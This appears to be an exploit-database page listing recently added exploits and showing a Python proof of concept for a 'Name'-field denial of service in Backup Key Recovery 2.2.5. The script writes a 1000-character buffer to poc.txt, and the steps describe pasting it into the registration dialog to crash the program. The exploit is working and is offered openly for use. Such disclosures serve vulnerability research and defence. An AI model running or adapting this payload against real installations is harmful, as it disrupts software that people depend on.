
14 changes to exploits/shellcodes SpotDialup 1.6.7 - 'Name' Denial of Service (PoC) SpotOutlook 1.2.6 - 'Name' Denial of Service (PoC) Top Password Software Dialup Password Recovery 1.30 - Denial of Service (PoC) Backup Key Recovery 2.2.5 - 'Name' Denial of Service (PoC) TaskCanvas 1.4.0 - 'Registration' Denial Of Service Top Password Firefox Password Recovery 2.8 - Denial of Service (PoC) Advanced System Repair Pro 1.9.1.7 - Insecure File Permissions Allok Video Converter 4.6.1217 - Stack Overflow (SEH) Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 - Stack Overflow (SEH) Microsoft Windows 10 build 1809 - Local Privilege Escalation (UAC Bypass) Chevereto 3.13.4 Core - Remote Code Execution Citrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution (Metasploit) Digi AnywhereUSB 14 - Reflective Cross-Site Scripting
33 lines
No EOL
970 B
Python
Executable file
33 lines
No EOL
970 B
Python
Executable file
# Exploit Title: Backup Key Recovery 2.2.5 - 'Name' Denial of Service (PoC)
|
|
# Exploit Author : Ismail Tasdelen
|
|
# Exploit Date: 2020-01-06
|
|
# Vendor Homepage : http://www.nsauditor.com/
|
|
# Link Software : http://www.nsauditor.com/downloads/backeyrecovery_setup.exe
|
|
# Tested on OS: Windows 10
|
|
# CVE : N/A
|
|
|
|
'''
|
|
Proof of Concept (PoC):
|
|
=======================
|
|
|
|
1.Download and install Backup Key Recovery
|
|
2.Run the python operating script that will create a file (poc.txt)
|
|
3.Run the software "Register -> Enter Registration Code
|
|
4.Copy and paste the characters in the file (poc.txt)
|
|
5.Paste the characters in the field 'Name' and click on 'Ok'
|
|
6.Backup Key Recovery Crashed
|
|
'''
|
|
|
|
#!/usr/bin/python
|
|
|
|
buffer = "A" * 1000
|
|
|
|
payload = buffer
|
|
try:
|
|
f=open("poc.txt","w")
|
|
print("[+] Creating %s bytes evil payload." %len(payload))
|
|
f.write(payload)
|
|
f.close()
|
|
print("[+] File created!")
|
|
except:
|
|
print("File cannot be created.") |